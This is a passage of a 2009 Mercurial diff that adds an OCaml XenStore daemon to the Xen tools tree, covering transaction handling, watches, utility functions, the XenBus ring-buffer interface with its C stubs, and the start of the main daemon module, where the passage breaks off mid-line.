--- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/transaction.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,287 @@ +(* + Transactions for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +type tr = + { + domain_id : int; + transaction_id : int32 + } + +type operation = + | NONE + | READ + | WRITE + | RM + +type element = + { + transaction : tr; + operation : operation; + path : string; + mutable modified : bool + } + +type changed_domain = + { + id : int; + entries : int + } + +let equal t1 t2 = + t1.domain_id = t2.domain_id && t1.transaction_id = t2.transaction_id + +let fire_watch watches changed_node = + match changed_node.operation with + | RM -> watches#fire_watches changed_node.path false true + | WRITE -> watches#fire_watches changed_node.path false false + | _ -> () + +let fire_watches watches changed_nodes = + List.iter (fire_watch watches) changed_nodes + +let make domain_id transaction_id = + { + domain_id = domain_id; + transaction_id = transaction_id + } + +let make_element transaction operation path = + { + transaction = transaction; + operation = operation; + path = path; + modified = false + } + +module Transaction_hashtbl = + Hashtbl.Make + (struct + type t = tr + let equal = equal + let hash = Hashtbl.hash + end) + +class transaction_reads = +object (self) + val m_paths = Hashtbl.create 32 + val m_transactions = Transaction_hashtbl.create 8 + method private paths = m_paths + method private transactions = m_transactions + method add transaction path = + let operation = make_element transaction READ path + and paths = self#paths + and transactions = self#transactions in + let path_operations = + if Hashtbl.mem paths path + then + let current_operations = Hashtbl.find paths path in + if not (List.exists (fun op -> transaction = op.transaction) current_operations) + then operation :: current_operations + else current_operations + else [ operation ] + and transaction_operations = + if Transaction_hashtbl.mem transactions transaction + then + let current_operations = Transaction_hashtbl.find transactions transaction in + if not (List.exists (fun op -> path = op.path) current_operations) + then operation :: current_operations + else current_operations + else [ operation ] in + Hashtbl.replace paths path path_operations; + Transaction_hashtbl.replace transactions transaction transaction_operations + method path_operations path = Hashtbl.find self#paths path + method remove_path_operation operation = + let remaining = List.filter (fun op -> not (equal op.transaction operation.transaction)) (self#path_operations operation.path) in + if List.length remaining > 0 + then Hashtbl.replace self#paths operation.path remaining + else Hashtbl.remove self#paths operation.path + method remove_transaction_operations transaction = + (try List.iter self#remove_path_operation (self#transaction_operations transaction) with Not_found -> ()); + Transaction_hashtbl.remove self#transactions transaction + method transaction_operations transaction = Transaction_hashtbl.find self#transactions transaction +end + +class ['contents] transaction_store (transaction : tr) (store : 'contents Store.store) (reads : transaction_reads) = +object (self) + inherit ['contents]Store.store as super + val m_reads = reads + val m_store = store + val m_transaction = transaction + val m_updates = Hashtbl.create 8 + method private domain_id = self#transaction.domain_id + method private merge_node node = + if self#op_exists node#path WRITE || self#op_exists node#path RM || self#op_exists node#path NONE + then self#store#replace_node node + else + match node#contents with + | Store.Children children | Store.Hack (_, children) -> List.iter (fun child -> self#merge_node child) children + | _ -> () + method private op_add path op = + match op with + | WRITE -> if not (self#op_exists path RM) then Hashtbl.replace self#updates path (make_element self#transaction op path) + | RM -> Hashtbl.replace self#updates path (make_element self#transaction op path) + | READ -> if not (self#op_exists path READ) then self#reads#add self#transaction path + | NONE -> Hashtbl.replace self#updates path (make_element self#transaction op path) + method private op_exists path op = + match op with + | WRITE | RM | NONE -> (try (Hashtbl.find self#updates path).operation = op with Not_found -> false) + | READ -> (try List.exists (fun op -> op.transaction = self#transaction) (self#reads#path_operations path) with Not_found -> false) + method private reads = m_reads + method private store = m_store + method private transaction = m_transaction + method private updates = m_updates + method changed_nodes = Hashtbl.fold (fun path element nodes -> element :: nodes) self#updates [] + method create_node path = + if not (self#op_exists path WRITE) then self#op_add path WRITE; + super#create_node path + method merge = self#merge_node self#root + method node_exists path = + if self#op_exists path WRITE || self#op_exists path RM || self#op_exists path NONE then super#node_exists path else self#store#node_exists path + method read_node path = + if self#op_exists path WRITE || self#op_exists path RM || self#op_exists path NONE + then super#read_node path + else ( + self#op_add path READ; + self#store#read_node path + ) + method remove_node path = + let parent_path = Store.parent_path path in + if self#op_exists parent_path WRITE || self#op_exists parent_path RM || self#op_exists parent_path NONE + then ( + super#remove_node path; + self#op_add path RM + ) + else ( + if not (super#node_exists parent_path) + then ( + super#create_node parent_path; + let contents = + (match (self#store#read_node parent_path) with + | Store.Children _ -> Store.Children [] + | Store.Hack (value, _) -> Store.Hack (value, []) + | contents -> contents) in + (super#get_node parent_path)#set_contents contents + ); + let self_parent_node = self#get_node parent_path in + match self_parent_node#contents with + | Store.Children self_parent_children | Store.Hack (_, self_parent_children) -> ( + (match self#store#read_node parent_path with + | Store.Children store_parent_children | Store.Hack (_, store_parent_children) -> List.iter (fun store_parent_child -> if not (List.exists (fun self_parent_child -> Store.compare self_parent_child store_parent_child = 0) self_parent_children) then ignore (self_parent_node#add_child store_parent_child)) store_parent_children + | Store.Empty -> () + | Store.Value _ -> raise (Constants.Xs_error (Constants.EINVAL, "Transaction.transaction_store#remove_node", path))); + self_parent_node#remove_child path; + self#op_add path RM; + self#op_add parent_path NONE + ) + | _ -> raise (Constants.Xs_error (Constants.EINVAL, "Transaction.transaction_store#remove_node", path)) + ) + method write_node path (contents : 'contents) = + if self#op_exists path WRITE || self#op_exists path RM || self#op_exists path NONE + then ( + if not (super#node_exists path) then super#create_node path; + self#op_add path WRITE; + super#write_node path contents + ) + else if self#store#node_exists path + then ( + self#create_node path; + super#write_node path contents + ) + else raise (Constants.Xs_error (Constants.EINVAL, "Transaction.transaction_store#write_node", path)) +end + +class ['contents] transactions (store : 'contents Store.store) = +object (self) + val m_base_store = store + val m_num_transactions = Hashtbl.create 8 + val m_reads = new transaction_reads + val m_transaction_changed_domains = Transaction_hashtbl.create 8 + val m_transaction_ids = Hashtbl.create 8 + val m_transactions = Transaction_hashtbl.create 8 + method private add transaction store = + if not (Transaction_hashtbl.mem self#transactions transaction) + then ( + Transaction_hashtbl.add self#transactions transaction (new transaction_store transaction store self#reads); + Transaction_hashtbl.add self#transaction_changed_domains transaction [ { id = transaction.domain_id; entries = 0 } ]; + Hashtbl.replace self#num_transactions transaction.domain_id (try succ (self#num_transactions_for_domain transaction.domain_id) with Not_found -> 1); + ) + method private num_transactions = m_num_transactions + method private reads = m_reads + method private remove transaction = + self#reads#remove_transaction_operations transaction; + Transaction_hashtbl.remove self#transactions transaction; + Transaction_hashtbl.remove self#transaction_changed_domains transaction; + Hashtbl.replace self#num_transactions transaction.domain_id (pred (self#num_transactions_for_domain transaction.domain_id)) + method private transaction_changed_domains = m_transaction_changed_domains + method private transaction_ids = m_transaction_ids + method private transaction_store transaction = Transaction_hashtbl.find self#transactions transaction + method private transactions = m_transactions + method private validate transaction = + try not (List.fold_left (fun modified op -> if equal op.transaction transaction then op.modified || modified else modified) false (self#reads#transaction_operations transaction)) + with _ -> true + method base_store = m_base_store + method commit transaction = + if self#validate transaction + then ( + let tstore = self#transaction_store transaction in + let changed_nodes = tstore#changed_nodes in + self#invalidate_nodes changed_nodes; + tstore#merge; + self#remove transaction; + changed_nodes + ) + else ( + self#remove transaction; + raise Not_found + ) + method domain_entries transaction = Transaction_hashtbl.find self#transaction_changed_domains transaction + method domain_entry_decr (transaction : tr) domain_id = + try + let domain_entry = List.find (fun entry -> entry.id = domain_id) (self#domain_entries transaction) in + let new_domain_entry = { id = domain_id; entries = pred domain_entry.entries } in + Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (List.filter (fun entry -> entry.id <> domain_id) (self#domain_entries transaction))) + with Not_found -> + let new_domain_entry = { id = domain_id; entries = (- 1) } in + Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (self#domain_entries transaction)) + method domain_entry_incr (transaction : tr) domain_id = + try + let domain_entry = List.find (fun entry -> entry.id = domain_id) (self#domain_entries transaction) in + let new_domain_entry = { id = domain_id; entries = succ domain_entry.entries } in + Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (List.filter (fun entry -> entry.id <> domain_id) (self#domain_entries transaction))) + with Not_found -> + let new_domain_entry = { id = domain_id; entries = 1 } in + Transaction_hashtbl.replace self#transaction_changed_domains transaction (new_domain_entry :: (self#domain_entries transaction)) + method exists transaction = Transaction_hashtbl.mem self#transactions transaction + method invalidate path = try List.iter (fun op -> op.modified <- true) (self#reads#path_operations path) with Not_found -> () + method invalidate_nodes nodes = List.iter (fun node -> self#invalidate node.path) nodes + method new_transaction (domain : Domain.domain) store = + if not (Hashtbl.mem self#transaction_ids domain#id) then Hashtbl.add self#transaction_ids domain#id 1l; + let transaction_id = Hashtbl.find self#transaction_ids domain#id in + let transaction = make domain#id transaction_id in + Hashtbl.replace self#transaction_ids domain#id (Int32.succ transaction_id); + if not (Transaction_hashtbl.mem self#transactions transaction) && transaction.transaction_id <> 0l + then (self#add transaction store; transaction) + else self#new_transaction domain store + method num_transactions_for_domain domain_id = try Hashtbl.find self#num_transactions domain_id with Not_found -> 0 + method remove_domain (domain : Domain.domain) = + Transaction_hashtbl.iter (fun transaction store -> if transaction.domain_id = domain#id then self#remove transaction) self#transactions; + Hashtbl.remove self#num_transactions domain#id; + Hashtbl.remove self#transaction_ids domain#id + method store transaction = try ((self#transaction_store transaction) :> 'contents Store.store) with Not_found -> self#base_store +end diff -r 10a8fae412c5 tools/xenstore/utils.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/utils.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,122 @@ +(* + Utils for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +(* Print an error to standard output stream and die *) +let barf str = + Printf.printf "FATAL: %s\n" str; flush stdout; + ignore (exit 1) + +(* Print an error to the error stream and die *) +let barf_perror str = + Printf.eprintf "FATAL: %s\n" str; flush stderr; + ignore (exit 1) + +(* Convert a string of bytes into an int32 *) +let bytes_to_int32 bytes = + let num_bytes = 4 in + (* Convert bytes to an int32 *) + let rec loop i n = + if i >= num_bytes + then n + else loop (succ i) (Int32.add (Int32.shift_left n 8) (Int32.of_int (int_of_char bytes.[(num_bytes - 1) - i]))) + in + loop 0 Int32.zero + +(* Convert a string of bytes into an int *) +let bytes_to_int bytes = + Int32.to_int (bytes_to_int32 bytes) + +let combine lst = + List.fold_left (fun rest i -> rest ^ i) Constants.null_string lst + +let combine_with_string lst str = + List.fold_left (fun rest i -> rest ^ i ^ str) Constants.null_string lst + +(* Convert an int into a string of bytes *) +let int32_to_bytes num = + let num_bytes = 4 in + let bytes = String.create num_bytes in + let rec loop i n = + if i < num_bytes + then ( + bytes.[i] <- char_of_int (Int32.to_int (Int32.logand 0xFFl n)); + loop (succ i) (Int32.shift_right_logical n 8) + ) + in + loop 0 num; + bytes + +(* Convert an int into a string of bytes *) +let int_to_bytes num = + int32_to_bytes (Int32.of_int num) + +(* Null terminate a string *) +let null_terminate str = + str ^ (String.make 1 Constants.null_char) + +(* Remove the last element from a list *) +let remove_last list = + let length = pred (List.length list) in + let rec loop n = (if (n = length) then [] else (List.nth list n :: loop (succ n))) in + loop 0 + +(* Clean a string up for output *) +let sanitise_string str = + let replacement_string = String.make 1 ' ' in + let rec replace_nulls s = + try + let i = String.index s Constants.null_char in + (String.sub s 0 i) ^ replacement_string ^ (replace_nulls (String.sub s (succ i) ((String.length s) - (succ i)))) + with Not_found -> s + in + replace_nulls str + +(* Split a string into a list of strings based on the specified character *) +let split_on_char str char = + let rec split_loop s = + if (s = Constants.null_string) then [] + else + try + let null_index = String.index s char in + String.sub s 0 null_index :: split_loop (String.sub s (succ null_index) ((String.length s) - (succ null_index))) + with Not_found -> [ s ] | Invalid_argument _ -> [] + in + split_loop str + +(* Split a string into a list of strings based on the null character *) +let split str = + split_on_char str Constants.null_char + +(* Strip the trailing null byte off a string, if there is one *) +let strip_null str = + if String.length str = 0 then str + else + let last = pred (String.length str) in + if str.[last] = Constants.null_char then String.sub str 0 last else str + +(* Return if a string contains another string *) +let rec strstr s1 s2 = + try + let i = String.index s1 s2.[0] in + if String.length (String.sub s1 i ((String.length s1) - i)) < String.length s2 + then false + else if String.sub s1 i (String.length s2) = s2 + then true + else strstr (String.sub s1 (succ i) ((String.length s1) - (succ i))) s2 + with Not_found -> false diff -r 10a8fae412c5 tools/xenstore/watch.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/watch.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,106 @@ +(* + Watches for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +type t = + { + domain : Domain.domain; + path : string; + token : string; + relative : bool + } + +let make domain path token relative = + { + domain = domain; + path = path; + token = token; + relative = relative + } + +let equal watch1 watch2 = + watch1.domain#id = watch2.domain#id && watch1.token = watch2.token && watch1.path = watch2.path + +(* Fire a watch *) +let fire_watch path recurse watch = + let relative_base_path = Store.domain_root ^ (string_of_int watch.domain#id) in + let relative_base_length = succ (String.length relative_base_path) in + if Store.is_child path watch.path + then + let watch_path = + if watch.relative + then String.sub path relative_base_length ((String.length path) - relative_base_length) + else path in + watch.domain#add_output_message (Message.event ((Utils.null_terminate watch_path) ^ (Utils.null_terminate watch.token))) + else if recurse && Store.is_child watch.path path + then + let watch_path = + if watch.relative + then String.sub watch.path relative_base_length ((String.length watch.path) - relative_base_length) + else watch.path in + watch.domain#add_output_message (Message.event ((Utils.null_terminate watch_path) ^ (Utils.null_terminate watch.token))) + +class watches = +object(self) + val m_domain_watches = Hashtbl.create 16 + val m_watches = Hashtbl.create 32 + method private add_domain_watch watch = + let watches = try Hashtbl.find self#domain_watches watch.domain#id with Not_found -> [] in + Hashtbl.replace self#domain_watches watch.domain#id (watch :: watches) + method private domain_watches = m_domain_watches + method private remove_domain_watch watch = + let watches = try Hashtbl.find self#domain_watches watch.domain#id with Not_found -> [] in + Hashtbl.replace self#domain_watches watch.domain#id (List.filter (fun w -> not (equal watch w)) watches) + method private watches = m_watches + method add (watch : t) = + if Hashtbl.mem self#watches watch.path + then ( + let path_watches = Hashtbl.find self#watches watch.path in + try ignore (List.find (equal watch) path_watches); false + with Not_found -> ( + Hashtbl.replace self#watches watch.path (watch :: path_watches); + self#add_domain_watch watch; + true + ) + ) + else ( + Hashtbl.add self#watches watch.path [ watch ]; + self#add_domain_watch watch; + true + ) + method fire_watches path in_transaction recursive = + if not in_transaction then Hashtbl.iter (fun _ watches -> List.iter (fire_watch path recursive) watches) self#watches + method num_watches_for_domain domain_id = try List.length (Hashtbl.find self#domain_watches domain_id) with Not_found -> 0 + method remove (watch : t) = + if Hashtbl.mem self#watches watch.path + then ( + let remaining_watches = List.filter (fun w -> not (equal watch w)) (Hashtbl.find self#watches watch.path) in + if List.length remaining_watches > 0 + then Hashtbl.replace self#watches watch.path remaining_watches + else Hashtbl.remove self#watches watch.path; + self#remove_domain_watch watch; + true + ) + else false + method remove_watches (domain : Domain.domain) = + if Hashtbl.mem self#domain_watches domain#id + then ( + List.iter (fun watch -> if self#remove watch then Trace.destroy watch.domain#id "watch") (Hashtbl.find self#domain_watches domain#id); + Hashtbl.remove self#domain_watches domain#id; + ) +end diff -r 10a8fae412c5 tools/xenstore/xenbus.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/xenbus.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,102 @@ +(* + XenBus for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let ring_size = 1024 + +type xenbus_t +type ring_t +type ring_index_t + +external init_req_cons : xenbus_t -> ring_index_t = "init_req_cons_c" +external init_req_prod : xenbus_t -> ring_index_t = "init_req_prod_c" +external init_req_ring : xenbus_t -> ring_t = "init_req_ring_c" +external init_rsp_cons : xenbus_t -> ring_index_t = "init_rsp_cons_c" +external init_rsp_prod : xenbus_t -> ring_index_t = "init_rsp_prod_c" +external init_rsp_ring : xenbus_t -> ring_t = "init_rsp_ring_c" +external read_ring : ring_t -> int -> string -> int -> int -> unit = "read_ring_c" +external write_ring : ring_t -> int -> string -> int -> int -> unit = "write_ring_c" +external get_index : ring_index_t -> int32 = "get_index_c" +external set_index : ring_index_t -> int32 -> unit = "set_index_c" +external mmap : int -> xenbus_t = "mmap_c" +external map_foreign : int -> int -> int -> xenbus_t = "xc_map_foreign_range_c" +external munmap : xenbus_t -> unit = "munmap_c" +external mb : unit -> unit = "mb_c" + +(* Ring buffer *) +class ring_buffer ring consumer producer = +object (self) + val m_consumer = consumer + val m_producer = producer + val m_ring = ring + method private advance_consumer amount = set_index m_consumer (Int32.add self#consumer (Int32.of_int amount)) + method private advance_producer amount = set_index m_producer (Int32.add self#producer (Int32.of_int amount)) + method private check_indexes = self#diff <= ring_size + method private consumer = get_index m_consumer + method private diff = Int32.to_int (Int32.sub self#producer self#consumer) + method private mask_index index = (Int32.to_int index) land (pred ring_size) + method private producer = get_index m_producer + method private ring = m_ring + method private set_producer index = set_index m_producer index + method can_read = self#diff <> 0 + method can_write = self#diff <> ring_size + method read buffer offset length = + let start = self#mask_index self#consumer + and diff = self#diff in + if not self#check_indexes then raise (Constants.Xs_error (Constants.EIO, "ring_buffer#read_ring", "could not check indexes")); + mb (); + let read_length = min (min diff length) (ring_size - start) in + read_ring self#ring start buffer offset read_length; + mb (); + self#advance_consumer read_length; + read_length + method write buffer offset length = + let start = self#mask_index self#producer + and diff = self#diff in + if not self#check_indexes then raise (Constants.Xs_error (Constants.EIO, "ring_buffer#write_ring", "could not check indexes")); + mb (); + let write_length = min (min (ring_size - diff) length) (ring_size - start) in + write_ring self#ring start buffer offset write_length; + mb (); + self#advance_producer write_length; + write_length +end + +(* XenBus interface *) +class xenbus_interface port xenbus = +object (self) + inherit Interface.interface as super + val m_port = port + val m_request_ring = new ring_buffer (init_req_ring xenbus) (init_req_cons xenbus) (init_req_prod xenbus) + val m_response_ring = new ring_buffer (init_rsp_ring xenbus) (init_rsp_cons xenbus) (init_rsp_prod xenbus) + val m_xenbus = xenbus + method private port = m_port + method private request_ring = m_request_ring + method private response_ring = m_response_ring + method can_read = self#request_ring#can_read + method can_write = self#response_ring#can_write + method destroy = if Eventchan.unbind self#port then munmap m_xenbus + method read buffer offset length = + let bytes_read = self#request_ring#read buffer offset (min length (String.length buffer)) in + Eventchan.notify self#port; + bytes_read + method write buffer offset length = + let bytes_written = self#response_ring#write buffer offset (min length (String.length buffer)) in + Eventchan.notify self#port; + bytes_written +end diff -r 10a8fae412c5 tools/xenstore/xenbus_c.c --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/xenbus_c.c Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,204 @@ +/* + XenBus C stubs for OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*/ + +#include +#include +#include +#include +#include + +#include +#include + +#include +#include +#include +#include + +/* Memory barrier */ +value mb_c (value dummy) +{ + CAMLparam1 (dummy); + + asm volatile ( "lock; addl $0,0(%%esp)" : : : "memory" ); + + CAMLreturn (Val_unit); +} + +/* Map a file */ +value mmap_c (value fd_v) +{ + CAMLparam1 (fd_v); + + int fd = Int_val (fd_v); + long pagesize = getpagesize(); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) mmap(NULL, pagesize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); + + CAMLreturn (rv); +} + +/* Unmap a file */ +value munmap_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + long pagesize = getpagesize(); + + CAMLreturn (Val_int (munmap(intf, pagesize))); +} + +/* Map a foreign page */ +value xc_map_foreign_range_c (value xc_handle_v, value domid_v, value mfn_v) +{ + CAMLparam3 (xc_handle_v, domid_v, mfn_v); + + int xc_handle = Int_val (xc_handle_v); + long pagesize = getpagesize(); + uint32_t domid = (uint32_t)(Int_val (domid_v)); + unsigned long mfn = (unsigned long)(Int_val (mfn_v)); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) xc_map_foreign_range(xc_handle, domid, pagesize, PROT_READ|PROT_WRITE, mfn); + + CAMLreturn (rv); +} + +value get_index_c (value index_v) +{ + CAMLparam1 (index_v); + + uint32_t i = *(uint32_t *)(Field (index_v, 0)); + + CAMLreturn (caml_copy_int32(i)); +} + +value set_index_c (value index_v, value val_v) +{ + CAMLparam2 (index_v, val_v); + + uint32_t i = Int32_val (val_v); + *(uint32_t *)(Field (index_v, 0)) = i; + + CAMLreturn (Val_unit); +} + +value init_req_ring_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->req); + + CAMLreturn (rv); +} + +value init_rsp_ring_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->rsp); + + CAMLreturn (rv); +} + +value init_req_cons_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->req_cons); + + CAMLreturn (rv); +} + +value init_req_prod_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->req_prod); + + CAMLreturn (rv); +} + +value init_rsp_cons_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->rsp_cons); + + CAMLreturn (rv); +} + +value init_rsp_prod_c (value xenbus_v) +{ + CAMLparam1 (xenbus_v); + + struct xenstore_domain_interface *intf = (struct xenstore_domain_interface *)Field (xenbus_v, 0); + value rv = alloc (Abstract_tag, 1); + Field (rv, 0) = (value) &(intf->rsp_prod); + + CAMLreturn (rv); +} + +/* Read from a ring buffer */ +value read_ring_c (value ring_v, value ring_ofs_v, value buff_v, value buff_ofs_v, value len_v) +{ + CAMLparam5 (ring_v, ring_ofs_v, buff_v, buff_ofs_v, len_v); + + char *ring = (char *)(Field (ring_v, 0)); + char *buff = String_val (buff_v); + int ring_ofs = Int_val (ring_ofs_v); + int buff_ofs = Int_val (buff_ofs_v); + int len = Int_val (len_v); + int i; + + for (i = 0; i < len; i++) { + buff[buff_ofs + i] = ring[ring_ofs + i]; + } + + CAMLreturn (Val_unit); +} + +/* Write to a ring buffer */ +value write_ring_c (value ring_v, value ring_ofs_v, value buff_v, value buff_ofs_v, value len_v) +{ + CAMLparam5 (ring_v, ring_ofs_v, buff_v, buff_ofs_v, len_v); + + char *ring = (char *)(Field (ring_v, 0)); + char *buff = String_val (buff_v); + int ring_ofs = Int_val (ring_ofs_v); + int buff_ofs = Int_val (buff_ofs_v); + int len = Int_val (len_v); + int i; + + for (i = 0; i < len; i++) { + ring[ring_ofs + i] = buff[buff_ofs + i]; + } + + CAMLreturn (Val_unit); +} diff -r 10a8fae412c5 tools/xenstore/xenstored.ml --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tools/xenstore/xenstored.ml Thu Jan 15 15:44:05 2009 -0800 @@ -0,0 +1,135 @@ +(* + OCaml XenStore Daemon. + Copyright (C) 2008 Patrick Colp University of British Columbia + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +*) + +let domxs_init id = + let port = Eventchan.bind_interdomain id (Os.get_xenbus_port ()) in + let interface = Os.map_xenbus port in + let connection = new Connection.connection interface in + Eventchan.notify port; + new Domain.domain id connection + +let domain_entry_change domains domain_entry = + if (domain_entry.Transaction.entries > 0) + then + for i = 1 to domain_entry.Transaction.entries do + domains#entry_incr domain_entry.Transaction.id + done + else if (domain_entry.Transaction.entries < 0) + then + for i = domain_entry.Transaction.entries to (- 1) do + domains#entry_decr domain_entry.Transaction.id + done + +class xenstored options store = +object(self) + val m_domains = new Domain.domains + val m_options : Option.t = options + val m_permissions = new Permission.permissions + val m_transactions = new Transaction.transactions store + val m_store = store + val m_watches = new Watch.watches + val mutable m_virq_port = Constants.null_file_descr + initializer m_permissions#set [ (Permission.string_of_permission (Permission.make Permission.NONE 0)) ] store Store.root_path; self#initialise_store + method private store = m_store + method add_domain domain = + self#domains#add domain; + Trace.create domain#id "connection" + method add_watch (domain : Domain.domain) watch = + if not (Domain.is_unprivileged domain) || self#watches#num_watches_for_domain domain#id < self#options.Option.quota_num_watches_per_domain + then self#watches#add watch + else raise (Constants.Xs_error (Constants.E2BIG, "Xenstored.xenstored#add_watch", "Too many watches")) + method commit transaction = + try + List.iter (domain_entry_change self#domains) (self#transactions#domain_entries transaction); + Transaction.fire_watches self#watches (self#transactions#commit transaction); + true + with _ -> false + method domain_entry_count transaction (domain_id : int) = + let entries = try self#domains#entry_count transaction.Transaction.domain_id with Not_found -> 0 in + try + let transaction_entries = (List.find (fun entry -> entry.Transaction.id = transaction.Transaction.domain_id) (self#transactions#domain_entries transaction)).Transaction.entries in + transaction_entries + entries + with Not_found -> entries + method domain_entry_decr store transaction path = + let domain_id = (List.hd (self#permissions#get store path)).Permission.domain_id in + if Domain.is_unprivileged_id domain_id then + if transaction.Transaction.transaction_id <> 0l + then self#transactions#domain_entry_decr transaction domain_id + else self#domains#entry_decr domain_id + method domain_entry_incr store transaction path = + let domain_id = (List.hd (self#permissions#get store path)).Permission.domain_id in + if Domain.is_unprivileged_id domain_id then + if transaction.Transaction.transaction_id <> 0l + then ( + self#transactions#domain_entry_incr transaction domain_id; + let entry_count = (List.find (fun entry -> entry.Transaction.id = domain_id) (self#transactions#domain_entries transaction)).Transaction.entries in + let entry_count_current = try self#domains#entry_count domain_id with Not_found -> 0 in + if entry_count + entry_count_current > self#options.Option.quota_num_entries_per_domain + then ( + self#transactions#domain_entry_decr transaction domain_id; + raise (Constants.Xs_error (Constants.EINVAL, "Xenstored.xenstored#domain_entry_incr", path)) + ) + ) + else ( + self#domains#entry_incr domain_id; + let entry_count = self#domains#entry_count domain_id in + if entry_count > self#options.Option.quota_num_entries_per_domain + then ( + self#domains#entry_decr domain_id; + raise (Constants.Xs_error (Constants.EINVAL, "Xenstored.xenstored#domain_entry_incr", path)) + ) + ) + method domains = m_domains + method initialise_domains = + if self#options.Option.domain_init + then ( + if Domain.xc_handle = Constants.null_file_descr then Utils.barf_perror "Failed to open connection to hypervisor\n"; + Eventchan.init (); + let dom0 = + if self#options.Option.separate_domain + then ( + self#add_domain (domxs_init (Os.get_domxs_id ())); + Domain.domu_init 0 (Os.get_dom0_port ()) (Os.get_dom0_mfn ()) true + ) + else domxs_init 0 in + m_virq_port <- Eventchan.bind_virq Constants.virq_dom_exc; + if m_virq_port = 